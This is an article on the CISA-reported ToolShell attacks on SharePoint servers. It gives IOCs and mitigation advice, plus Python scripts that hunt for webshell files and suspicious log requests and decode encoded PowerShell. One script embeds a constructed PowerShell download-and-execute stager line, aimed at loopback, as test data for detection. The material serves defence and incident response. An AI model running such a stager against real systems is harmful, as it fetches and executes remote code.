CISA warns of active attacks targeting Microsoft SharePoint servers. The campaign, called "ToolShell," could expose businesses and organizations to further breaches.
In a newly published report, CISA reveals that attackers are chaining two critical Microsoft SharePoint vulnerabilities to hijack on-premises servers and steal their cryptographic machine keys.
Attack Breakdown of the ToolShell Attack:
- Initial Access: Attackers chain two vulnerabilities to upload malicious files:
  - CVE-2025-49706 (authentication bypass)
  - CVE-2025-49704 (remote code execution)
- Key Theft: Malicious DLLs (bjcloiyq.dll, osvmhdfl.dll) extract SharePoint's ASP.NET machine keys. These keys (the validationKey and decryptionKey in web.config) validate and decrypt ViewState and other signed data, so whoever holds them can forge that data and keep access even after the server is patched.
- Webshell Deployment: Attackers install ASPX backdoors (spinstall0.aspx, info3.aspx) to execute commands and upload more malware.
Key Threats in the Wild
- Stolen Keys: Exfiltrated in HTTP headers (e.g., X-TXT-NET).
- Webshell Capabilities:
  - Execute PowerShell commands (spinstallb.aspx, spinstallp.aspx)
  - Upload files
  - Bypass authentication using hardcoded passwords
- System Fingerprinting: Collects drive data, usernames, and OS details.
Critical IOCs
Files (SHA256):
3461da3a2ddcced4a00f87dcd7650af48f97998a3ac9ca649d7ef3b7332bd997 (osvmhdfl.dll)
60a37499f9b02c203af24c2dfd7fdb3834cea707c4c56b410a7e68376938c4b7 (stage3.txt)
92bb4ddb98eeaf11fc15bb32e71d0a63256a0ed826a03ba293ce3a8bf057a514 (spinstall0.aspx)
9340bf7378234db5bca0dc5378bf764b6a24bb87a42b05fa21a996340608fbd7 (info3.aspx)
d0c4d6a4be0a65f8ca89e828a3bc810572fff3b3978ff0552a8868c69f83d170 (spinstallp.aspx)
d9c4dd5a8317d1d83b5cc3482e95602f721d58e3ba624d131a9472f927d33b00 (spinstallb.aspx)
675a10e87c248d0f629da864ba8b7fd92b62323c406a69dec35a0e6e1552ecbc (info3.aspx)
bee94b93c1796981a55d7bd27a32345a61304a88ed6cd70a5f7a402f1332df72 (bjcloiyq.dll)
IPs
107.191.58.76, 104.238.159.149, 96.9.125.147, 103.186.30.186, 45.77.155.170, 139.144.199.41, 172.174.82.132, 89.46.223.88, 154.223.19.106, 185.197.248.131, 149.40.50.15, 64.176.50.109, 149.28.124.70, 206.166.251.228, 95.179.158.42, 86.48.9.38, 128.199.240.182, 212.125.27.102, 91.132.95.60, 134.199.202.205, 131.226.2.6, 188.130.206.168
Immediate Actions
- Patch SharePoint: Prioritize CVE-2025-49704, CVE-2025-49706, and related flaws. Patching does not invalidate machine keys that were already stolen, so rotate the ASP.NET machine keys after patching.
- Scan Systems: Hunt for:
  - Files in /_layouts/15/ or TEMPLATE\LAYOUTS\ (e.g., spinstall*.aspx)
  - Unusual HTTP headers like X-TXT-NET
- Inspect Authentication Logs: Look for unexpected access to SignOut.aspx or ToolPane.aspx.
- Isolate Compromised Systems: If IOCs are found.
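The file and log hunts in the list above, as an added example (Python; not code from the CISA report or from Microsoft). It assumes you point scan_layouts() at the on-disk LAYOUTS directory and scan_iis_log() at IIS W3C log lines. The temporary directory, the hostname sp.example.local and the log lines are constructed; the file it plants under the name spinstall0.aspx holds a placeholder, not the real webshell. The script rates a POST to ToolPane.aspx carrying a SignOut.aspx Referer above a bare ToolPane.aspx hit, because that is the request shape Microsoft's write-up documents for the exploit.

```python
"""Hunt for ToolShell artifacts on a SharePoint host (added example, not CISA code).
Check 1: files under the LAYOUTS directory whose name or SHA-256 matches the IOCs.
Check 2: IIS W3C log lines that hit ToolPane.aspx or request an IOC filename.
The sample directory, hostname and log lines at the bottom are constructed."""
import hashlib
import os
import re
import tempfile
from pathlib import Path

# SHA-256 IOCs from the report; the filename each was reported under is in the comment
IOC_SHA256 = {
    "3461da3a2ddcced4a00f87dcd7650af48f97998a3ac9ca649d7ef3b7332bd997",  # osvmhdfl.dll
    "60a37499f9b02c203af24c2dfd7fdb3834cea707c4c56b410a7e68376938c4b7",  # stage3.txt
    "92bb4ddb98eeaf11fc15bb32e71d0a63256a0ed826a03ba293ce3a8bf057a514",  # spinstall0.aspx
    "9340bf7378234db5bca0dc5378bf764b6a24bb87a42b05fa21a996340608fbd7",  # info3.aspx
    "d0c4d6a4be0a65f8ca89e828a3bc810572fff3b3978ff0552a8868c69f83d170",  # spinstallp.aspx
    "d9c4dd5a8317d1d83b5cc3482e95602f721d58e3ba624d131a9472f927d33b00",  # spinstallb.aspx
    "675a10e87c248d0f629da864ba8b7fd92b62323c406a69dec35a0e6e1552ecbc",  # info3.aspx
    "bee94b93c1796981a55d7bd27a32345a61304a88ed6cd70a5f7a402f1332df72",  # bjcloiyq.dll
}
# Attacker IPs from the report (VPN and cloud hosts, so a weak indicator on its own)
IOC_IPS = set("""107.191.58.76 104.238.159.149 96.9.125.147 103.186.30.186 45.77.155.170
139.144.199.41 172.174.82.132 89.46.223.88 154.223.19.106 185.197.248.131 149.40.50.15
64.176.50.109 149.28.124.70 206.166.251.228 95.179.158.42 86.48.9.38 128.199.240.182
212.125.27.102 91.132.95.60 134.199.202.205 131.226.2.6 188.130.206.168""".split())
# Filenames the report lists for the webshells, staged payload and key-stealing DLLs
IOC_NAME = re.compile(r"^(spinstall.*\.aspx|info3\.aspx|stage3\.txt|bjcloiyq\.dll|osvmhdfl\.dll)$", re.I)

def sha256_of(path):
    return hashlib.sha256(Path(path).read_bytes()).hexdigest()

def scan_layouts(root):
    """Walk the on-disk LAYOUTS tree (...\\TEMPLATE\\LAYOUTS) and flag IOC files."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in sorted(files):
            path = Path(dirpath) / name
            reasons = []
            if IOC_NAME.match(name):
                reasons.append("ioc-filename")
            if sha256_of(path) in IOC_SHA256:
                reasons.append("ioc-sha256")  # definitive: the exact reported sample
            if reasons:
                hits.append({"path": str(path), "reasons": reasons})
    return hits

def parse_w3c(lines):
    """Yield one dict per IIS W3C record, keyed by the names in the #Fields: directive."""
    fields = None
    for line in lines:
        line = line.rstrip("\r\n")
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split(" ")
            if len(values) == len(fields):
                yield dict(zip(fields, values))

def scan_iis_log(lines):
    alerts = []
    for rec in parse_w3c(lines):
        name = rec.get("cs-uri-stem", "").rsplit("/", 1)[-1].lower()
        referer = rec.get("cs(Referer)", "").lower()
        ip = rec.get("c-ip", "")
        reasons = []
        if name == "toolpane.aspx":
            # Microsoft's write-up: the exploit POSTs to ToolPane.aspx with a SignOut.aspx Referer
            if rec.get("cs-method") == "POST" and "signout.aspx" in referer:
                reasons.append("toolpane-post-signout-referer")
            else:
                reasons.append("toolpane-access")
        elif IOC_NAME.match(name):
            reasons.append("ioc-filename-request")  # someone is calling a webshell by name
        if ip in IOC_IPS:
            reasons.append("ioc-ip")
        if reasons:
            alerts.append({"time": rec.get("time"), "ip": ip, "uri": rec.get("cs-uri-stem"), "reasons": reasons})
    return alerts

def build_sample_layouts():
    """Constructed LAYOUTS tree: one benign page, one placeholder named like the webshell."""
    root = Path(tempfile.mkdtemp(prefix="layouts-"))
    (root / "default.aspx").write_text('<%@ Page Language="C#" %>\n')
    (root / "spinstall0.aspx").write_text("<!-- placeholder, not the real webshell -->\n")
    return root

# Constructed IIS log; the attacker IP is borrowed from the report's list, the host is made up
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query cs(Referer) sc-status
2025-07-19 02:14:07 10.0.0.12 GET /_layouts/15/start.aspx - - 200
2025-07-19 02:15:31 107.191.58.76 POST /_layouts/15/ToolPane.aspx DisplayMode=Edit http://sp.example.local/_layouts/SignOut.aspx 200
2025-07-19 02:15:40 107.191.58.76 GET /_layouts/15/spinstall0.aspx - - 200
2025-07-19 02:16:02 10.0.0.34 GET /_layouts/15/SignOut.aspx - - 302
"""

if __name__ == "__main__":
    for hit in scan_layouts(build_sample_layouts()):
        print("FILE", hit)
    for alert in scan_iis_log(SAMPLE_LOG.splitlines()):
        print("LOG ", alert)
```

A hash match is definitive; a filename or IP match is a lead to examine, since the webshell can be dropped under any name and the IPs are VPN and cloud hosts. Plain GET requests to SignOut.aspx are ordinary sign-outs and are deliberately not flagged on their own. Note that IIS's default W3C logging does not record custom request or response headers, so X-TXT-NET will not show up in these logs unless you have added custom logging fields or capture traffic at a reverse proxy or WAF.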
The Webshells Are Full Control Panels
One of the files presents a login form, but it never checks a username: authentication is a cookie carrying a base64-encoded hash, and if that hash matches the hardcoded value, you're in.
Once inside, the shell gives the hacker three capabilities:
- Command execution — run Windows commands on the SharePoint server
- File upload — send a file and put it anywhere on the file system
- Credential grabber — steal saved key settings from SharePoint config
It looks like a tool built for ongoing access, not a quick hit: a small but sophisticated webshell that gives the attackers access from anywhere.
Who’s Doing This?
CISA didn’t name names. But they mention some threat actor groups in passing — Linen Typhoon, Violet Typhoon, and Storm-2603.
Those names have come up before. They’re known for targeting U.S. infrastructure.
Some of the IP addresses used in the attacks are tied to VPN services and cloud hosts. So it’s hard to say where they’re really from. But it’s clear this is not some low-level hack.
What You Should Do Right Now
If your org uses SharePoint (especially on-prem):
- Patch immediately. Microsoft's advisory is out.
- Scan your web directories. Look for suspicious .aspx files.
- Check logs. Review traffic to /_layouts/ and ToolPane.aspx.
- Watch for PowerShell usage. Especially base64 and encoded scripts.
- Apply the Sigma and YARA rules. They catch known patterns.
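Decoding the encoded PowerShell that the list above tells you to watch for, as an added example (Python; not code from the report or from Microsoft). It assumes you feed it CommandLine values from process-creation telemetry (Windows event 4688 or Sysmon event 1). The four sample events are constructed, the loopback URL is a placeholder, and only the name stage3.txt is borrowed from the IOC list.

```python
"""Decode and flag encoded PowerShell command lines (added example, not from the report).
Input is a CommandLine from process-creation telemetry (event 4688, Sysmon event 1).
powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...)
and the payload is base64 over UTF-16LE, which is why a plain base64 decode of one
shows NUL-padded text. The sample events at the bottom are constructed."""
import base64
import re

# A switch starting with "e" followed by a base64-shaped token; analyze_command_line()
# then checks the switch is really a prefix of EncodedCommand (so -ep and -ex are skipped).
ENC_SWITCH = re.compile(r"(?:^|\s)[-/](e[a-z]*)\s+([A-Za-z0-9+/=]{8,})", re.I)
# Substrings worth surfacing from the raw command line or the decoded script
INDICATORS = ("iex", "invoke-expression", "downloadstring", "frombase64string",
              "-nop", "hidden", "bypass")


def decode_encoded_command(b64):
    """Text behind -EncodedCommand; raises ValueError on bad base64 or odd byte counts."""
    return base64.b64decode(b64, validate=True).decode("utf-16-le")


def make_encoded(script):
    """Inverse of decode_encoded_command(); only used to build the constructed samples."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def analyze_command_line(cmd):
    result = {"encoded": False, "decoded": None, "indicators": []}
    for m in ENC_SWITCH.finditer(cmd):
        switch, payload = m.group(1).lower(), m.group(2)
        if not "encodedcommand".startswith(switch):
            continue  # e.g. "-ep Unrestricted" is ExecutionPolicy, not a payload
        result["encoded"] = True
        try:
            result["decoded"] = decode_encoded_command(payload)
        except ValueError:  # binascii.Error and UnicodeDecodeError both derive from it
            result["decoded"] = None  # malformed payload: keep it flagged for a human
        break
    haystack = (cmd + " " + (result["decoded"] or "")).lower()
    result["indicators"] = [s for s in INDICATORS if s in haystack]
    return result


# Constructed samples. The second decodes to a stager-style one-liner aimed at loopback;
# stage3.txt is borrowed from the IOC list only as a filename.
STAGE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://127.0.0.1/stage3.txt')"
SAMPLE_EVENTS = [
    "powershell.exe -NoProfile -ExecutionPolicy Bypass -w hidden -enc dwBoAG8AYQBtAGkA",
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -e ' + make_encoded(STAGE_SCRIPT),
    "powershell.exe -Command Get-SPFarm",
    "powershell.exe -enc ZZZZZZZZZ",  # switch present, payload is not valid base64
]

if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        print(analyze_command_line(event))
```

The first sample decodes to whoami, the second to the stager one-liner, and the fourth stays flagged even though its payload will not decode: a malformed blob after -enc is still not something an administrator typed. The prefix check matters because powershell.exe accepts abbreviated switches, so a rule that only looks for the literal string -EncodedCommand misses -e and -enc.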